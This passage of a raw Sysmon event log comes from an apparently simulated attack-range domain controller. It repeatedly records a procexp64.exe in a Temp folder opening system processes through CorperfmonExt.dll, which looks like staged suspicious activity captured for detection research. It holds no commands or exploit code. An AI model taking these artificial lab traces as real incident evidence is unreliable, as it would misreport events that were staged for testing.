15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 